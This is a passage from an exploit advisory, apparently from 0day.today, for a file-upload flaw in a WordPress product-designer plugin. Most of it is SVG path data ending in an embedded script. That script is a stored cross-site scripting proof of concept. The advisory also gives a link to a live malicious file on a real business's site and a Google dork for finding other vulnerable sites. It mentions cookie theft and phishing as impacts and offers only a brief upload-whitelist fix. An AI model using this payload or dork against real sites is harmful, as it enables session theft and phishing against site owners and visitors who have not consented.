c5 -14 4 -15 -9 -4 -17 14 -19 20 -6 20 5 0 12 -7 15 -16z m-21 -16 c-2 -5 -3 -33 -3 -63 0 -54 0 -55 -30 -55 -30 0 -30 0 -30 58 0 32 2 61 5 63 7 8 60 5 58 -3z m37 -74 c0 -41 -4 -63 -10 -59 -5 3 -10 1 -10 -4 0 -6 -7 -11 -17 -11 -15 0 -15 1 0 18 11 12 17 36 17 70 0 29 5 52 10 52 6 0 10 -29 10 -66z m-103 -70 c-9 -9 -28 6 -21 18 4 6 10 6 17 -1 6 -6 8 -13 4 -17z"/> <path d="M2080 1459 c0 -5 5 -7 10 -4 6 3 10 8 10 11 0 2 -4 4 -10 4 -5 0 -10 -5 -10 -11z"/> <path d="M129 1110 c-1 -3 -2 -53 -3 -112 l-1 -108 87 0 88 0 0 113 0 112 -85 0 c-47 0 -86 -2 -86 -5z m42 -34 c-5 -6 -11 -29 -14 -51 -4 -34 -4 -33 -4 11 0 35 4 51 14 51 8 0 9 -4 4 -11z m98 -3 c0 -11 -3 -13 -6 -5 -11 28 -23 -3 -23 -64 l0 -64 -30 0 -31 0 3 63 c3 58 5 62 26 60 13 -2 25 4 28 12 8 21 34 19 33 -2z m8 -55 c-3 -7 -5 -2 -5 12 0 14 2 19 5 13 2 -7 2 -19 0 -25z m0 -50 c-3 -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z m-107 -41 c0 -18 -2 -19 -10 -7 -13 20 -13 43 0 35 6 -3 10 -16 10 -28z m103 3 c-3 -12 -8 -19 -11 -16 -5 6 5 36 12 36 2 0 2 -9 -1 -20z"/> <path d="M420 1004 l0 -114 30 0 30 0 0 113 0 114 -30 1 -30 1 0 -115z"/> <path d="M600 1115 c-1 0 -2 -51 -3 -113 l-2 -112 88 0 88 0 -3 111 -3 111 -83 1 c-45 1 -82 2 -82 2z m42 -43 c-7 -2 -12 -16 -13 -30 0 -15 -3 -21 -6 -14 -8 21 6 64 19 56 9 -6 9 -9 0 -12z m95 3 c0 -8 -4 -12 -9 -9 -4 3 -8 9 -8 15 0 5 4 9 8 9 5 0 9 -7 9 -15z m-27 -70 l0 -65 -30 0 c-30 0 -30 0 -30 58 0 65 3 72 37 72 22 0 23 -4 23 -65z m-48 -85 c23 -9 23 -9 -3 -9 -27 -1 -40 15 -38 47 0 12 3 10 9 -6 5 -12 20 -27 32 -32z m88 6 c0 -17 -2 -18 -10 -6 -7 11 -10 11 -10 2 0 -7 -4 -11 -10 -7 -13 8 -2 32 15 32 9 0 15 -10 15 -21z"/> <path d="M884 1111 c-2 -2 -4 -53 -4 -113 l0 -108 33 0 32 0 -3 114 -3 114 -25 -2 c-14 0 -28 -3 -30 -5z m23 -53 c-3 -7 -5 -2 -5 12 0 14 2 19 5 13 2 -7 2 -19 0 -25z m13 -78 c0 -5 -4 -10 -10 -10 -5 0 -10 5 -10 10 0 6 5 10 10 10 6 0 10 -4 10 -10z"/> <path d="M2020 1111 c-24 -5 -34 -11 -32 -21 2 -8 1 -12 -3 -8 -4 4 -25 -3 -46 -14 -38 -20 -39 -21 -39 -77 0 -31 -3 -66 -6 -78 -6 -23 -5 -23 85 -23 l91 0 0 115 c0 63 -3 114 -7 114 -5 -1 -24 -5 -43 -8z m29 -58 c-1 -17 -3 -21 -6 -10 -2 9 -9 17 -14 17 -5 0 -9 5 -9 10 0 6 7 10 15 10 10 0 15 -9 14 -27z m-39 -48 l0 -65 -30 0 c-30 0 -30 0 -30 58 0 65 3 72 37 72 22 0 23 -4 23 -65z m-83 30 c0 -8 -4 -15 -9 -15 -10 0 -11 14 -1 23 9 10 10 9 10 -8z m16 -92 c4 -19 2 -33 -3 -33 -6 0 -10 1 -10 3 -10 64 -10 81 -2 72 5 -5 12 -25 15 -42z m101 15 c-4 -13 -7 -29 -7 -35 0 -7 -6 -13 -12 -13 -9 0 -9 9 -1 35 6 19 15 35 19 35 5 0 5 -10 1 -22z"/> <path d="M2210 1003 l0 -113 88 0 87 0 0 111 0 110 -88 2 -87 2 0 -112z m59 75 c6 -7 22 -13 34 -13 20 0 22 -6 25 -62 l3 -63 -31 0 -30 0 0 59 c0 36 -5 63 -13 69 -20 17 -10 -118 11 -140 9 -11 11 -18 4 -18 -19 0 -30 33 -32 100 -1 36 -2 68 -1 73 2 11 15 9 30 -5z m90 -53 c-1 -77 -11 -110 -32 -111 -10 -1 -12 0 -3 3 27 8 36 131 11 157 -14 13 -13 15 5 13 18 -1 20 -8 19 -62z"/> <path d="M2530 1115 c0 0 -1 -51 -3 -113 l-2 -112 88 0 87 0 0 113 0 112 -85 0 c-47 0 -85 0 -85 0z m33 -67 c-7 -59 -13 -61 -13 -5 0 26 4 47 9 47 4 0 6 -19 4 -42z m110 21 c-4 -15 -8 -17 -14 -8 -8 14 -3 29 11 29 4 0 6 -9 3 -21z m-33 -66 c0 -63 0 -63 -29 -63 -28 0 -29 1 -30 57 0 67 1 69 33 69 25 0 26 -2 26 -63z m34 -21 c-2 -67 -3 -72 -15 -72 -5 0 -7 5 -3 12 4 6 6 29 6 51 -2 33 3 57 11 57 1 0 1 -21 1 -48z"/> <path d="M2800 1003 l0 -113 30 0 30 0 0 113 0 114 -30 0 -30 0 0 -114z m39 10 c-1 -67 -2 -67 -10 -23 -11 63 -11 90 1 90 6 0 9 -28 9 -67z"/> <path d="M1870 1080 c-66 -23 -63 -23 -54 -8 4 7 3 8 -5 4 -6 -4 -9 -11 -6 -15 7 -13 -65 -58 -112 -70 -23 -7 -67 -25 -98 -41 -58 -31 -95 -38 -95 -19 0 5 -4 8 -9 5 -5 -4 -22 -1 -38 5 -15 6 -40 12 -55 14 -15 2 -38 11 -52 20 -27 18 -98 33 -81 17 6 -5 36 -19 67 -32 32 -12 55 -26 52 -31 -3 -5 1 -6 9 -3 8 3 42 -4 75 -15 74 -25 109 -27 114 -5 2 9 37 30 87 50 47 19 85 33 86 31 1 -1 -2 -15 -6 -32 -4 -16 -7 -22 -8 -12 -2 31 -26 13 -29 -21 -3 -30 -1 -32 27 -32 31 0 31 0 32 58 l0 57 70 35 c39 19 75 41 81 47 13 16 14 16 -52 -7z"/> <path d="M1180 770 c0 -5 5 -10 11 -10 5 0 7 5 4 10 -3 6 -8 10 -11 10 -2 0 -4 -4 -4 -10z"/> <path d="M150 634 c0 -74 4 -113 10 -109 6 3 10 26 10 50 0 44 0 44 33 39 46 -7 97 26 97 63 0 50 -33 73 -104 73 l-46 0 0 -116z m111 86 c26 -14 24 -55 -3 -74 -12 -9 -37 -16 -55 -16 -33 0 -33 0 -33 50 l0 50 36 0 c19 0 44 -5 55 -10z"/> <path d="M562 638 c2 -69 7 -112 13 -110 6 1 10 24 10 50 0 44 2 47 24 44 13 -2 44 -26 69 -53 24 -27 48 -46 53 -43 5 3 -11 26 -36 52 l-44 46 29 12 c44 19 51 61 16 91 -21 18 -39 23 -82 23 l-54 0 2 -112z m122 76 c21 -20 20 -30 -4 -54 -13 -13 -33 -20 -60 -20 l-40 0 0 45 0 45 44 0 c27 0 51 -6 60 -16z"/> <path d="M1023 729 c-57 -36 -67 -123 -20 -166 53 -49 105 -56 158 -20 44 29 62 81 47 131 -22 70 -118 98 -185 55z m142 -25 c38 -41 31 -116 -14 -151 -29 -22 -95 -16 -125 12 -36 34 -37 105 -1 140 35 36 106 35 140 -1z"/> <path d="M1521 658 c-1 -50 -7 -98 -13 -105 -6 -7 -26 -13 -45 -13 -20 0 -32 -4 -28 -10 10 -17 60 -11 82 10 13 11 24 38 28 62 8 58 2 141 -12 145 -7 3 -11 -27 -12 -89z"/> <path d="M1830 645 c0 -58 -1 -108 -2 -112 -2 -5 32 -9 75 -11 48 -2 77 1 77 8 0 6 -27 10 -65 10 l-65 0 0 45 0 45 55 0 c30 0 55 5 55 10 0 6 -25 10 -55 10 l-55 0 0 40 0 40 65 0 c37 0 65 4 65 10 0 6 -32 10 -75 10 l-75 0 0 -105z"/> <path d="M2278 734 c-32 -17 -58 -62 -58 -100 0 -61 59 -114 127 -114 29 0 83 26 83 40 0 15 -16 12 -30 -5 -15 -18 -82 -20 -112 -4 -11 6 -26 26 -34 46 -30 72 12 133 92 133 23 0 46 -4 49 -10 7 -12 35 -13 35 -2 0 30 -107 41 -152 16z"/> <path d="M2660 740 c0 -5 21 -10 46 -10 l45 0 -2 -102 c-1 -69 2 -103 10 -106 8 -3 11 28 11 102 l0 106 45 0 c25 0 45 5 45 10 0 6 -40 10 -100 10 -60 0 -100 -4 -100 -10z"/> <path d="M481 504 c0 -11 3 -14 6 -6 3 7 2 16 -1 19 -3 4 -6 -2 -5 -13z"/> <path d="M2805 381 c-24 -5 -35 -17 -57 -59 l-27 -53 -27 55 c-25 52 -30 56 -62 56 l-34 0 48 -67 c40 -56 48 -75 49 -113 0 -43 1 -45 30 -45 29 0 30 1 27 43 -3 37 2 50 47 112 28 38 47 71 43 73 -4 2 -20 1 -37 -2z m-78 -163 c-3 -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z"/> <path d="M157 268 l2 -113 28 0 28 1 3 112 3 112 -33 0 -33 0 2 -112z"/> <path d="M340 266 l0 -113 25 0 c24 0 25 2 25 62 0 43 -5 66 -15 75 -18 15 -16 57 2 57 15 0 17 -13 3 -22 -5 -3 -7 -12 -3 -21 3 -8 8 -13 10 -10 3 2 27 -21 55 -52 70 -79 70 -79 96 -87 22 -6 22 -6 22 109 l0 116 -25 0 c-24 0 -25 -2 -25 -64 0 -53 3 -65 18 -69 14 -4 14 -5 -3 -6 -13 0 -41 24 -80 68 -40 46 -68 70 -82 70 -23 1 -23 -1 -23 -113z m65 54 c-3 -5 -12 -10 -18 -10 -7 0 -6 4 3 10 19 12 23 12 15 0z m115 -115 c0 -8 -2 -15 -4 -15 -2 0 -6 7 -10 15 -3 8 -1 15 4 15 6 0 10 -7 10 -15z"/> <path d="M696 355 c-30 -27 -29 -26 -17 -58 7 -17 25 -30 60 -43 54 -19 64 -36 31 -54 -15 -8 -27 -7 -49 4 -26 14 -30 14 -45 -3 -15 -17 -14 -19 24 -36 52 -23 104 -12 134 28 19 26 19 30 6 54 -9 15 -33 32 -60 42 -27 10 -46 24 -48 35 -3 15 3 17 49 14 43 -2 54 0 57 13 3 19 -24 29 -79 29 -25 0 -45 -8 -63 -25z"/> <path d="M950 268 l0 -113 82 2 c77 1 83 3 86 24 4 21 1 22 -52 16 l-56 -6 0 30 c0 28 2 29 44 29 40 0 44 2 39 21 -5 18 -11 19 -44 14 -38 -7 -39 -6 -39 24 0 31 0 31 55 31 48 0 55 2 55 20 0 18 -7 20 -85 20 l-85 0 0 -112z m37 60 c-3 -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z m9 -56 c-4 -26 -21 -24 -22 2 -1 16 3 23 11 20 7 -3 12 -13 11 -22z"/> <path d="M1260 365 c-46 -25 -67 -92 -44 -141 29 -61 103 -87 167 -60 60 24 44 54 -19 37 -68 -19 -115 29 -94 95 13 38 32 46 99 42 28 -2 45 1 48 9 11 30 -110 44 -157 18z"/> <path d="M1522 289 c3 -82 5 -92 28 -109 36 -28 83 -33 126 -15 55 23 63 39 64 133 l0 82 -30 0 -30 0 0 -78 c0 -85 -8 -102 -50 -102 -42 0 -50 17 -50 102 l0 78 -31 0 -31 0 4 -91z m188 -69 c-6 -11 -13 -20 -16 -20 -2 0 0 9 6 20 6 11 13 20 16 20 2 0 0 -9 -6 -20z"/> <path d="M1860 267 l0 -114 31 0 c30 0 31 1 27 44 -3 35 0 43 14 43 10 0 27 -17 40 -39 17 -31 30 -40 57 -45 19 -3 37 -3 40 -1 2 3 -15 27 -37 54 -39 46 -40 50 -22 56 26 8 40 36 33 64 -8 32 -54 51 -123 51 l-60 0 0 -113z m125 63 c12 -20 -6 -47 -38 -57 l-32 -10 3 39 c4 34 7 38 32 38 16 0 32 -5 35 -10z m32 -12 c-3 -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z m-120 -70 c-3 -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z"/> <path d="M2160 266 l0 -113 30 1 30 1 0 113 0 112 -30 0 -30 0 0 -114z m37 -38 c-3 -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z"/> <path d="M2320 360 c0 -17 7 -20 40 -20 l40 0 0 -93 0 -94 30 0 30 0 0 94 0 93 35 0 c28 0 35 4 35 20 0 19 -7 20 -105 20 -98 0 -105 -1 -105 -20z m110 -35 c0 -5 -5 -3 -10 5 -5 8 -10 20 -10 25 0 6 5 3 10 -5 5 -8 10 -19 10 -25z m8 -56 c-3 -20 -5 -19 -9 9 -3 20 -2 29 4 23 5 -5 7 -19 5 -32z"/> <path d="M818 123 c7 -3 16 -2 19 1 4 3 -2 6 -13 5 -11 0 -14 -3 -6 -6z"/> </g> <script type="text/javascript"> alert("@insecurity"); </script> </svg> ------------------------------------------------------------------------------------------------------------- Here is a live example: https://www.saltsidecreations.com/wp-content/uploads/fancy_products_uploads/2017/04/28/insecurity.svg This could have a variety of impacts ranging from stealing cookies and regular XSS-related risks to a highly effective spear phishing campaign Google Dork: inurl:fancy_products_uploads ------------------------------------------------------------------------------------------------------------- How to fix: Use whitelist for file upload (e.g. only allow JPG and PNG, no .svg) There's also multiple full path disclosure for this plugin but WP is riddled with FPD. If you're interested then get in touch (although im pretty sure there's tons of files in /wp-includes/ that will give you FPD anyway presuming no error_reporting(0) set) # 0day.today [2024-12-25] #